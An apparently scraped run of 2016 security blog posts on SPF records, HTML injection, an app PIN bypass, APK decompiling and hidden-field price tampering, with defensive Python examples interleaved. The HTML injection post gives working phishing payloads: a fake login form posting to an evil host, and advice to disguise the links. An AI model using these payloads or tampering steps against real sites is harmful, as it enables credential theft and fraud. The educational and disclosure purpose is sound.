<b>If you enter an email id which doesn't have an account on the website, the whole email is returned on the next page.</b></div>
<div>
<b><br /></b></div>
<div>
<b>I reported this bug to the CoinBeyond team and they said they would fix it, but after 7 months they are still not able to provide any ETA for a fix, and they are not replying to me, so I am disclosing this bug.</b></div>
<div>
<b>More bugs coming soon</b></div>
<div>
<b><br /></b></div>
<div>
<b><br /></b></div>
<div>
<b>Regards</b></div>
<div>
<b>Jitendra Singh(Team Computer-Korner)</b></div>
<b><br /></b>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-29828962904090837782016-04-17T23:27:00.001+05:302016-04-17T23:33:08.650+05:30Missing SPF record: Vulnerability Or Not ?<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b><br /></b>
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.yourhowto.net/wp-content/uploads/2013/08/email-620x556.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="286" src="https://www.yourhowto.net/wp-content/uploads/2013/08/email-620x556.jpg" width="320" /></a></div>
<b><br /></b>
<b>Hi Followers ,</b><br />
<b>First of all sorry for the delay in the new post.</b><br />
<b><br /></b>
<b>This post is about the SPF (Sender Policy Framework) record. I am writing it because many bug hunters think this is a simple and common vulnerability. But from my perspective it is not a security issue at all.</b><br />
<b>Many security researchers who want to make easy money from bug hunting report this first to any website that has a bug bounty program, and within 1 or 2 hours there will be about 30-40 reports about SPF records.</b><br />
<h3 style="text-align: left;">
<b>What are SPF records ?</b></h3>
<div>
<b>Basically, Sender Policy Framework records are used when you want to allow some third-party service to send emails on behalf of your domain. The purpose of adding these records is to prevent malicious users from sending forged email from your domain. </b></div>
<div>
<b><br /></b></div>
<div>
<b>But there is an exception: SPF records alone can't prevent malicious users from sending email from your domain; you also have to add a DMARC record. I have written a post about this and you can find it <a href="http://www.computerkorner.org/2015/08/understanding-dmarc-record-why-it-is.html" rel="nofollow" target="_blank">Here</a>.</b></div>
<div>
<b><br /></b></div>
<div style="text-align: left;">
<b>The SPF record of a domain looks like this one </b></div>
<div style="text-align: left;">
v=spf1 include:_spf.google.com ~all </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>There are two ways of defining all: </b></div>
<div style="text-align: left;">
<b>1. ~all: used for softfail</b></div>
<div style="text-align: left;">
<b>2. -all: used for hardfail</b></div>
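<div>
As an added example, not from the post, the Python below evaluates records of the shape shown above the way a receiving mail server does: it parses each term into qualifier and mechanism, follows include:, and returns softfail for ~all and fail for -all; a domain with no record at all yields "none", which is the case the post argues is not a vulnerability by itself. The DNS answers are a constructed table so the example runs offline; the include target _spf.mailprovider.test stands in for a real provider's record and is not anyone's actual SPF data.</div>

```python
import ipaddress

# Constructed TXT answers standing in for real DNS lookups (offline demo).
FAKE_TXT = {
    # same shape as the post's example record, softfail on everything else
    "example.test": "v=spf1 include:_spf.mailprovider.test ~all",
    # hardfail variant: only one /24 may send
    "strict.test": "v=spf1 ip4:198.51.100.0/24 -all",
    # constructed provider record reached through include:
    "_spf.mailprovider.test": "v=spf1 ip4:203.0.113.0/24 -all",
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def parse_spf(record: str):
    """Split 'v=spf1 include:x ~all' into [(qualifier, mechanism, argument), ...].
    A missing qualifier means '+' (pass), as in RFC 7208."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF record")
    parsed = []
    for term in terms[1:]:
        qual = "+"
        if term[0] in QUALIFIERS:
            qual, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        parsed.append((qual, mech.lower(), arg))
    return parsed


def check_host(domain: str, sender_ip: str, txt=FAKE_TXT, depth: int = 0) -> str:
    """Return pass / fail / softfail / neutral / none for a sending IP,
    following ip4, ip6 and include mechanisms and the final all qualifier."""
    if depth > 10:
        return "permerror"        # RFC 7208 caps DNS-mechanism recursion
    record = txt.get(domain)
    if record is None:
        return "none"             # no SPF record: the receiver cannot judge
    ip = ipaddress.ip_address(sender_ip)
    for qual, mech, arg in parse_spf(record):
        matched = False
        if mech == "all":
            matched = True
        elif mech in ("ip4", "ip6"):
            # membership test is False when address families differ
            matched = ip in ipaddress.ip_network(arg, strict=False)
        elif mech == "include":
            # include matches only when the referenced record says pass
            matched = check_host(arg, sender_ip, txt, depth + 1) == "pass"
        if matched:
            return QUALIFIERS[qual]
    return "neutral"              # record ended without an all mechanism


if __name__ == "__main__":
    for dom, ip in (("example.test", "203.0.113.5"), ("example.test", "192.0.2.1"),
                    ("strict.test", "192.0.2.1"), ("nospf.test", "192.0.2.1")):
        print(f"{dom:<16} {ip:<14} -> {check_host(dom, ip)}")
```

<div>
The difference between ~all and -all is only the qualifier returned on the last line of the loop; what a receiver does with softfail versus fail is the policy question the post's DMARC discussion below is about.</div>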
<div>
<b><br /></b></div>
<div>
<b>Basically the SPF check is done by the receiving MTA, and if there is no SPF record it checks the MX record of the domain. As I also stated above, SPF records are only necessary if you want to allow a third-party service to send emails on behalf of your domain.</b></div>
<div>
<b><br /></b></div>
<div>
<b>And if you are not using any third-party service, then you don't have to add SPF records.</b></div>
<div>
<b><br /></b></div>
<div>
<b>Missing SPF records don't pose a security risk at all. </b><br />
<b>However, to prevent spamming from a particular domain you also have to define DMARC records.</b><br />
<b>DMARC records dictate the mail policy of a domain. Mainly, once DMARC records are added, the SPF record lists the domains which are used for sending email on behalf of that domain, and if someone tries to spoof email from a third-party service which is not defined in the SPF record, the mail will be rejected or marked as spam by the mail servers.</b><br />
<b><br /></b>
<b><br /></b>
<b>Hope this post helped you. </b><br />
<b>If you have any suggestion about how we can make this blog more interesting, or a question about this post, feel free to comment.</b><br />
<b><br /></b>
<b><br /></b>
<b>Cheers</b><br />
<b>Jitendra (Team Computer Korner)</b><br />
<b><br /></b>
<b><br /></b></div>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-35207350310015202932016-03-29T10:00:00.000+05:302016-03-29T10:00:18.142+05:30WebApp Pentesting:What is HTML Injection <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.lomaymi.com/wp-content/uploads/2012/04/HTML-Injection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.lomaymi.com/wp-content/uploads/2012/04/HTML-Injection.png" height="186" width="320" /></a></div>
<b><br /></b>
<b>Hi Everyone </b><br />
<b><br /></b>
<b>So In this post we will talk about HTML injection.</b><br />
<b><br /></b>
<b>HTML injection is similar to a Cross-Site Scripting (XSS) attack. But in XSS we insert malicious script tags to run JavaScript, whereas in HTML injection we use HTML tags to modify the page for malicious purposes.</b><br />
<b><br /></b>
<br />
<h3 style="text-align: left;">
<b>Why does HTML injection happen?</b></h3>
<div>
<b>When an application does not properly handle user supplied data, an attacker can supply valid HTML, typically via a parameter value, and inject their own content into the page.</b></div>
<div>
<b><br /></b></div>
<div style="text-align: left;">
To demonstrate this I have hosted a vulnerable webpage at http://htmli.comlu.com/html.php<br />
When you visit this page you can see that it says<br />
Hi Mr Thanks for looking here<br />
Now you can pass it a parameter by adding ?name=ANY_HTML_VALUE, so the final URL will be<br />
http://htmli.comlu.com/html.php?name=ANY_VALUE.<br />
<br />
Let's try to exploit it.<br />
<br />
First we will put some content in a &lt;b&gt; tag.<br />
Use this URL and you can see that the text is rendered bold (dark black): http://htmli.comlu.com/html.php?name=&lt;b&gt;html-injection&lt;/b&gt;<br />
<br />
<h4 style="text-align: left;">
Redirecting the user to a malicious site </h4>
<div>
http://htmli.comlu.com/html.php?name=&lt;a href="evilsite.com"&gt;Click here to login&lt;/a&gt;</div>
<div>
<br /></div>
<h4 style="text-align: left;">
Creating a fake login form</h4>
<div>
http://htmli.comlu.com/html.php?name=&lt;form action="evilform.php" method="post"&gt;&lt;input type="text" name="user" placeholder="username"&gt;&lt;/br&gt;&lt;input type="password" name="pass" placeholder="pass"&gt;&lt;!--</div>
<div>
I used a comment opener at the end of the form so that the rest of the page content after it is commented out and not displayed.</div>
</div>
<b><br /></b>
<h4>
Displaying a Fake Message</h4>
<div>
To display a fake message you can use this: http://htmli.comlu.com/html.php?name=<p>we have changed our website login page please go to evilsite.com for login</p></div>
<div>
<br /></div>
<div>
<br /></div>
<b>The problem is that if we send this URL to a user as-is, he will see the HTML in the link and realise that it is a phishing attempt.</b><br />
<b>So you can URL-encode the payload, or shorten the URL with a URL shortening service such as goo.gl (Google has since discontinued goo.gl; any other shortener works the same way).</b><br />
<b><br /></b>
<b><br /></b>
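To make the mechanism concrete, here is an added example; it is not code from the original post, and the PHP behind htmli.comlu.com is not shown on the page, so the vulnerable function below is a stand-in that does what the post describes (pastes the name parameter straight into the page). Next to it is the same page with the parameter HTML-encoded, a small parser that lists which tags the parameter managed to introduce, and the URL-encoding step from the last paragraph. The evilsite.example host, the evilform.php action and the list of template tags are assumptions made for the example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlencode

# Stand-in for the vulnerable html.php: the ?name= value is concatenated into the page (assumption).
TEMPLATE_TAGS = ("html", "body", "p")

def render_vulnerable(name: str) -> str:
    return "<html><body><p>Hi Mr " + name + " Thanks for looking here</p></body></html>"

# Hardened version: HTML-encode the parameter, so it can only ever be displayed as text.
def render_safe(name: str) -> str:
    return ("<html><body><p>Hi Mr " + html.escape(name, quote=True)
            + " Thanks for looking here</p></body></html>")

class TagCollector(HTMLParser):
    """Records every start tag (and its attributes) a browser would act on."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

def injected_tags(page: str):
    """Tags in the rendered page that are not part of the template: evidence of injection."""
    parser = TagCollector()
    parser.feed(page)
    parser.close()
    return [(tag, attrs) for tag, attrs in parser.tags if tag not in TEMPLATE_TAGS]

# The fake-login-form payload from the post; the trailing <!-- hides the rest of the template.
# evilsite.example is a placeholder host.
FAKE_FORM = ('<form action="https://evilsite.example/evilform.php" method="post">'
             '<input type="text" name="user" placeholder="username"><br>'
             '<input type="password" name="pass" placeholder="pass"><!--')

def build_url(base: str, payload: str) -> str:
    """Percent-encode the payload the way a phishing link would be built, so no raw '<' is visible."""
    return base + "?" + urlencode({"name": payload})

def demo():
    vulnerable = render_vulnerable(FAKE_FORM)
    safe = render_safe(FAKE_FORM)
    return {
        "tags_injected_in_vulnerable_page": [tag for tag, _ in injected_tags(vulnerable)],
        "tags_injected_in_safe_page": [tag for tag, _ in injected_tags(safe)],
        "phishing_url": build_url("http://htmli.comlu.com/html.php", FAKE_FORM),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

The vulnerable page ends up containing a form whose action points at the attacker's host, while the encoded page shows the payload as literal text and the parser finds nothing beyond the template. The same `injected_tags` check is a reasonable way to confirm a finding in a test: render with the payload, parse, and look for tags you did not put there.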
<b>That's all for this post.</b><br />
<b>Hope you enjoyed it.</b><br />
<b><br /></b>
<b>Suggestions are welcome. Please comment below with your feedback.</b><br />
<b><br /></b>
<b><br /></b>
<b>Thanks</b><br />
<b>Jitendra Kumar Singh(Team Computer Korner)</b><br />
<b> </b>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendra (http://www.blogger.com/profile/12006899852837970196), 0 comments.
Post: Bypassing Four digit Pin lock Of GiftCards.com Mobile App (published 2016-03-27T23:53:00+05:30, updated 2016-03-27T23:53:10+05:30)<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://e870cfe4b60e0ee059e6-255af679d99329b12de7149087702e5c.ssl.cf2.rackcdn.com/logos/GiftCards_800@2x.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://e870cfe4b60e0ee059e6-255af679d99329b12de7149087702e5c.ssl.cf2.rackcdn.com/logos/GiftCards_800@2x.png" /></a></div>
<b><br /></b>
<b><br /></b>
<b>Hi Everyone,</b><br />
<b><br /></b>
<b>This post is about a simple vulnerability through which I was able to bypass the 4-digit PIN lock in the GiftCards.com Android app.</b><br />
<b><br /></b>
<h3 style="text-align: left;">
<b>Description </b></h3>
<div>
<b>The GiftCards.com Android app lets you set a 4-digit PIN. This PIN protects your account from intruders: every time you open the app, you have to enter the PIN in order to access the account.</b></div>
<div>
<b>There is also rate limiting in place: if you try to brute-force the PIN, the app logs you out, and you have to sign in again in order to access the account.</b></div>
<div>
<b>But through a simple vulnerability I could bypass the 4-digit PIN.</b></div>
<div>
<b><br /></b></div>
<h3 style="text-align: left;">
<b>How I am able to Bypass it</b></h3>
<div>
<b>The exploit is very simple.</b></div>
<div>
<b>Remember one thing: after entering a wrong PIN five times it will log you out.</b></div>
<div>
<b>Now let's start; this assumes you have physical access to the device.</b></div>
<div>
<b>Configure Burp as the proxy for your mobile device so that it intercepts all of the device's traffic. Now open the app; it will ask you for the PIN.</b></div>
<div>
<b><br /></b></div>
<div>
<b>When you open the app, a request like this passes through Burp:</b></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiGPe7GM2Ycat0s2J4sDl6yYSFvuU63VxV3Zkdk-K52rgiwNkF_n3XKzlz98EpfSTo3oOm0k1ZmuwcuTur06SQM_m4lqDzlMoyFl3_QqmfZp3n9TqUAZ6WmEi2K21lFYqGsdm6Edt31zM/s1600/giftcards.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiGPe7GM2Ycat0s2J4sDl6yYSFvuU63VxV3Zkdk-K52rgiwNkF_n3XKzlz98EpfSTo3oOm0k1ZmuwcuTur06SQM_m4lqDzlMoyFl3_QqmfZp3n9TqUAZ6WmEi2K21lFYqGsdm6Edt31zM/s320/giftcards.png" width="320" /></a></div>
<div>
<b><br /></b></div>
<div>
<b>The PIN has not been entered at this point.</b></div>
<div>
<b><br /></b></div>
<div>
<b>Now enter a wrong PIN; as mentioned, you have five attempts.</b></div>
<div>
<b>If you enter a wrong PIN,</b></div>
<div>
<b>you will see a response like this:</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgisQqvw46oohaKzfrUip3LOz3LCZFTocXFJLFrU09Lm7LodFhbIEghK-YdVqmKiGaLXeyzA2Z-8peWzh0UCxUaFFQEHiLAXB8soXccSsSS-eqvzqCaONgs611ApI5d-4jrjb6iIncQheI/s1600/giftcards1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgisQqvw46oohaKzfrUip3LOz3LCZFTocXFJLFrU09Lm7LodFhbIEghK-YdVqmKiGaLXeyzA2Z-8peWzh0UCxUaFFQEHiLAXB8soXccSsSS-eqvzqCaONgs611ApI5d-4jrjb6iIncQheI/s320/giftcards1.png" width="320" /></a></div>
<div>
<b><br /></b></div>
<b><br /></b>
<b>You can easily see that the PIN is included in the response.</b><br />
With it I can bypass the 4-digit PIN countermeasure and access private information such as credit card details, purchased gift cards and much more.<br />
<br />
P.S.: My device is not rooted, and I never perform tests on a rooted device, since rooting removes one of the most important security features of Android.<br />
<br />
Hope you enjoyed it; let me know what you think in the comments.<br />
<br />
Reported to the GiftCards.com security team on January 19, 2016.<br />
No response from the team.<br />
Disclosed on March 27, 2016.<br />
<br />
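The flaw described above is a server that echoes the secret it is supposed to be checking. As an added example (this is not GiftCards.com's code, and the page does not show their response format), the Python below contrasts a "leaky" verifier that behaves the way the post describes with a server-side gate that stores only a salted hash of the PIN, counts failures, locks after five wrong attempts, and answers with nothing but a verdict and the remaining attempts. The `leaks_pin` helper is the check a tester would run on the intercepted response. The five-attempt limit comes from the post; the hashing parameters and response field names are assumptions.

```python
import hashlib
import hmac
import json
import os

MAX_ATTEMPTS = 5                # the post: five wrong PINs and the app logs you out
PBKDF2_ROUNDS = 20_000          # assumption; kept low so the example runs quickly

def hash_pin(pin: str, salt: bytes) -> bytes:
    """Salted PBKDF2 so a leaked database still costs work per guess, even with only 10,000 PINs."""
    return hashlib.pbkdf2_hmac("sha256", pin.encode(), salt, PBKDF2_ROUNDS)

class PinGate:
    """Server-side PIN check: stores a salted hash only, counts failures, never echoes the PIN."""

    def __init__(self, pin: str):
        if not (pin.isdigit() and len(pin) == 4):
            raise ValueError("PIN must be exactly four digits")
        self.salt = os.urandom(16)
        self.digest = hash_pin(pin, self.salt)
        self.failures = 0

    def verify(self, attempt: str) -> dict:
        if self.failures >= MAX_ATTEMPTS:
            # Locked: the caller has to re-authenticate with the full credentials.
            return {"ok": False, "locked": True, "attempts_left": 0}
        if hmac.compare_digest(hash_pin(attempt, self.salt), self.digest):
            self.failures = 0
            return {"ok": True, "locked": False, "attempts_left": MAX_ATTEMPTS}
        self.failures += 1
        locked = self.failures >= MAX_ATTEMPTS
        return {"ok": False, "locked": locked, "attempts_left": MAX_ATTEMPTS - self.failures}

def leaky_verify(stored_pin: str, attempt: str) -> dict:
    """Models the class of bug the post describes: the error response carries the real PIN."""
    if attempt == stored_pin:
        return {"ok": True}
    return {"ok": False, "message": "Wrong PIN", "pin": stored_pin}

def leaks_pin(response: dict, pin: str) -> bool:
    """What you look for in the intercepted response body: does the secret appear anywhere in it?"""
    return pin in json.dumps(response)

if __name__ == "__main__":
    gate = PinGate("4321")
    print("hardened, wrong PIN:", gate.verify("0000"), "leaks:", leaks_pin(gate.verify("1111"), "4321"))
    bad = leaky_verify("4321", "0000")
    print("leaky, wrong PIN:", bad, "leaks:", leaks_pin(bad, "4321"))
```

The lockout in `PinGate` lives on the server, tied to the account, which is the only place it means anything; a lockout enforced in the app alone can be removed by patching the app. Equally, the comparison happens server-side on a hash, so no request or response ever has to contain the PIN itself.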
Thanks<br />
Jitendra Kumar Singh (Team Computer- Korner)<br />
<br />
<br />
</div>
Jitendra (http://www.blogger.com/profile/12006899852837970196), 0 comments.
Post: Exploring Android: How to Read the AndroidManifest.xml file (published 2016-03-24T23:12:00+05:30, updated 2016-03-24T23:12:15+05:30)<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.dailymobile.net/wp-content/uploads/2014/12/androidlogo1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.dailymobile.net/wp-content/uploads/2014/12/androidlogo1.jpg" height="192" width="320" /></a></div>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Hi Everyone,</b><br />
<b><br /></b>
<b>In the last post of Exploring Android we talked about how to decompile an Android app using dex2jar and JD-GUI.</b><br />
<b>But what if you want to read its AndroidManifest.xml, or you need other files like images and layouts?</b><br />
<b>There is also a way to read these files. The AndroidManifest.xml is the one you want first, because it tells you which activities, services, broadcast receivers and content providers the app exports, and so which of them any other app on the device can reach.</b><br />
<b><br /></b>
<b>To get all the files and folders mentioned in <a href="http://www.computerkorner.org/2016/02/exploring-android-what-is-android-apk.html" rel="nofollow" target="_blank">this</a> post there is a tool you can use.</b><br />
<b>The name of the tool is apktool. You can download it from <a href="http://ibotpeaches.github.io/Apktool/" rel="nofollow" target="_blank">Here</a>.</b><br />
<b>After downloading the jar, put it in a new folder.</b><br />
<h3 style="text-align: left;">
<b>Steps to Decompile </b></h3>
<div>
<ol style="text-align: left;">
<li><b>First of all copy apktool into a separate folder and copy the Android APK you want to decompile into the same folder.</b></li>
<li><b>Now open a command prompt in that folder. On Windows you can do it by holding Shift and right-clicking inside the folder.</b></li>
<li><b>Now run this command: <i><u>java -jar apktool.jar d androidPackagename.apk</u></i> (the <i>d</i> stands for decode; without it apktool only prints its usage).</b></li>
<li><b>A new folder will be created with the same name as the APK file, minus the .apk extension.</b></li>
<li><b>Now you can read all the files, including the decoded AndroidManifest.xml and the XML under res, plus the smali disassembly of the code.</b></li>
</ol>
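Once apktool has decoded the manifest, the useful next step is to pull out the exported components. The following is an added example, not part of the original post or of apktool: it parses a decoded AndroidManifest.xml with Python's standard XML library and applies Android's export rule (an explicit android:exported wins; otherwise a component with an intent-filter is exported, and a content provider defaults to exported only when targetSdkVersion is below 17). The manifest it runs on is a constructed sample, and component names in it are placeholders. Note that since Android 12 the build fails unless components with intent filters declare android:exported explicitly, so on recent apps the implicit branch matters less.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")

# Constructed sample of a decoded AndroidManifest.xml (not taken from any real app).
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.app">
  <uses-sdk android:minSdkVersion="21" android:targetSdkVersion="29"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Example">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".DebugActivity" android:exported="true"/>
    <activity android:name=".SettingsActivity"/>
    <service android:name=".SyncService" android:exported="false"/>
    <provider android:name=".DataProvider" android:authorities="com.example.app.data"
              android:exported="true" android:permission="com.example.app.READ_DATA"/>
    <receiver android:name=".BootReceiver">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
  </application>
</manifest>
"""

def android_attr(element, name):
    """Read an attribute from the android: namespace (ElementTree expands the prefix)."""
    return element.get("{%s}%s" % (ANDROID_NS, name))

def is_exported(component, target_sdk):
    """Android's rule: explicit android:exported wins; otherwise an intent-filter means
    exported, and a provider defaults to exported only below targetSdkVersion 17."""
    explicit = android_attr(component, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if component.tag == "provider":
        return target_sdk < 17
    return component.find("intent-filter") is not None

def exported_components(manifest_xml):
    """The exported components: the attack surface another app on the device can reach."""
    root = ET.fromstring(manifest_xml)
    uses_sdk = root.find("uses-sdk")
    # No uses-sdk means an old app; assume the lowest target so providers count as exported.
    target_sdk = int(android_attr(uses_sdk, "targetSdkVersion") or 1) if uses_sdk is not None else 1
    result = []
    for component in root.find("application"):
        if component.tag in COMPONENT_TAGS and is_exported(component, target_sdk):
            result.append({
                "type": component.tag,
                "name": android_attr(component, "name"),
                "permission": android_attr(component, "permission"),  # None: reachable by any app
            })
    return result

def unprotected_exports(manifest_xml):
    """Exported components with no permission requirement: the first things to probe with adb."""
    return [c["name"] for c in exported_components(manifest_xml) if c["permission"] is None]

if __name__ == "__main__":
    for component in exported_components(SAMPLE_MANIFEST):
        print(component)
    print("no permission required:", unprotected_exports(SAMPLE_MANIFEST))
```

On a real target, point `exported_components` at the AndroidManifest.xml in the folder apktool produced. The launcher activity will always be in the list; the interesting entries are the others, especially exported providers and any activity or receiver that requires no permission.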
<b><div>
<b><br /></b></div>
If you need more information about this you can comment below, and if you want a video showing this, ask for it in the comments as well.</b></div>
<div>
<b><br /></b></div>
<div>
<b>Thanks</b></div>
<div>
<b>Jitendra K Singh (Team Computer-Korner) </b></div>
<b><br /></b>
<b><br /></b>
<b><br /></b>
</div>
Jitendra (http://www.blogger.com/profile/12006899852837970196), 0 comments.
Post: Hidden HTML Tag: How they Can Lead to A Severe Vulnerability (published 2016-03-14T23:38:00+05:30, updated 2016-03-14T23:38:43+05:30)<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b><b>Hi there</b><br />
<b><br /></b>
<b>So this post is about how hidden HTML form fields can lead to a severe vulnerability.</b><br />
<br />
<br />
<h3 style="text-align: left;">
What are hidden HTML tags?</h3>
<div>
The basic syntax for defining a hidden field is <i><input type="hidden" name="any_name" value="value"></i>. The browser submits it with the form but does not display it; the user can still read and edit it.</div>
<div>
Developers commonly use this for the CSRF token in forms, which is fine. The problem starts when the hidden value is something the server should decide (a price, a user id, a role), because a hidden field is just as editable as any other request parameter.</div>
<div>
<br /></div>
<h3 style="text-align: left;">
How can this lead to a severe vulnerability?</h3>
<b>Some days ago I was testing a website for vulnerabilities. On this website you can upload images and then share them with others, or keep them in a private album.</b><br />
<b>They also have a paid plan which gives more storage.</b><br />
<b><br /></b>
<b>I checked their plans: there is a plan of 18 Euro per year, and they offer PayPal to pay for it.</b><br />
<b>However, the price of the subscription was placed in a hidden HTML field, so this caught my attention.</b><br />
<b><br /></b>
<b>You can use two methods to exploit this:</b><br />
<b><br /></b>
<b>1. Use the Chrome developer tools: open Inspect Element and there will be a line of code like this</b><br />
<b><input type="hidden" value="18" name="a3">. All you have to do is change the value to whatever you want, like 1.</b><br />
<b><br /></b>
<b>2. Use Burp: intercept the request, change the value of a3 and forward the request, and it is done.</b><br />
<b><br /></b>
<b>So the conclusion is: do not define the price in a hidden HTML field. And if you do pass it through the client, the server must not trust it: look the price up from the plan id on the server side, and when the payment is made, verify that the amount actually paid matches the price of that plan before activating it.</b><br />
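As an added example of the server-side fix (not the affected site's code, whose back end is not shown), the Python below prices an order from the plan id and ignores the client's a3 field except to flag tampering, then checks the payment notification against the order before activating anything. The plan ids and the shop's receiver address are placeholders; the notification field names follow PayPal's IPN as the author of this example remembers them (receiver_email, payment_status, mc_currency, mc_gross, custom) and should be treated as an assumption to map onto whatever your processor actually sends.

```python
from decimal import Decimal

# Server-side price list: the only source of truth for what a plan costs.
# Constructed for this example; the EUR 18 yearly price mirrors the post.
PLANS = {"free": Decimal("0.00"), "storage-yearly": Decimal("18.00")}
CURRENCY = "EUR"

class CheckoutError(Exception):
    pass

def create_order(order_id, plan_id, form):
    """Price the order from the plan id. The hidden field the client sent ('a3' in the post)
    is never used for the amount; it is only compared so that tampering can be logged."""
    if plan_id not in PLANS:
        raise CheckoutError("unknown plan")
    price = PLANS[plan_id]
    sent = form.get("a3")
    tampered = sent is not None and Decimal(sent) != price
    return {"order_id": order_id, "plan": plan_id, "amount": price,
            "currency": CURRENCY, "paid": False, "client_tampered": tampered}

def payment_problems(order, notification, expected_receiver):
    """Every mismatch between the payment the processor reports and the order we priced."""
    problems = []
    if notification.get("receiver_email") != expected_receiver:
        problems.append("paid to wrong account")
    if notification.get("payment_status") != "Completed":
        problems.append("payment not completed")
    if notification.get("mc_currency") != order["currency"]:
        problems.append("currency mismatch")
    if Decimal(notification.get("mc_gross", "0")) != order["amount"]:
        problems.append("amount mismatch")
    if notification.get("custom") != order["order_id"]:
        problems.append("notification is for a different order")
    if order["paid"]:
        problems.append("order already paid (replayed notification)")
    return problems

def activate_plan(order, notification, expected_receiver):
    """Activate only when the money that actually arrived matches the plan's real price."""
    problems = payment_problems(order, notification, expected_receiver)
    if problems:
        raise CheckoutError("; ".join(problems))
    order["paid"] = True
    return order

if __name__ == "__main__":
    order = create_order("ord-42", "storage-yearly", {"a3": "1"})   # attacker changed 18 -> 1
    print("order priced server-side:", order)
    notice = {"receiver_email": "shop@example.com", "payment_status": "Completed",
              "mc_currency": "EUR", "mc_gross": "1.00", "custom": "ord-42"}
    print("problems with a 1 EUR payment:", payment_problems(order, notice, "shop@example.com"))
```

Two things the code deliberately does: it uses Decimal rather than float for money, and it treats a second notification for an already-paid order as a replay. With a real processor you would additionally verify the notification's authenticity (for PayPal IPN that means posting it back to PayPal for validation) before running these checks.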
<b><br /></b>
<b><br /></b>
<b>That's all for this post.</b><br />
<b>Suggestions are welcome.</b><br />
<b><br /></b>
<b><br /></b>
<b>Thanks </b><br />
<b>Jitendra Santram Singh (Team Computer Korner ) </b><br />
<b><br /></b>
<b><br /></b>
<b><br /></b>
</div>
Jitendra (http://www.blogger.com/profile/12006899852837970196), 0 comments.
Post: Exploring Android: De-compiling An Android APK (published 2016-03-09T00:07:00+05:30, updated 2016-03-09T00:07:14+05:30)<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.dailymobile.net/wp-content/uploads/2014/12/androidlogo1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.dailymobile.net/wp-content/uploads/2014/12/androidlogo1.jpg" height="192" width="320" /></a></div>
<br />
<b><br /></b>
<b><br /></b>
<b>Hi again </b><br />
<b><br /></b>
<b>In the last post we talked about what an Android APK is.</b><br />
<b>In this post we will talk about how to decompile an Android APK.</b><br />
<b>To decompile an Android APK there are two tools we will use:</b><br />
<b><br /></b>
<b>1. dex2jar: converts the app's classes.dex (Dalvik bytecode) into a JAR of ordinary Java .class files. You can download it from <a href="https://sourceforge.net/projects/dex2jar/" rel="nofollow" target="_blank">here</a>.</b><br />
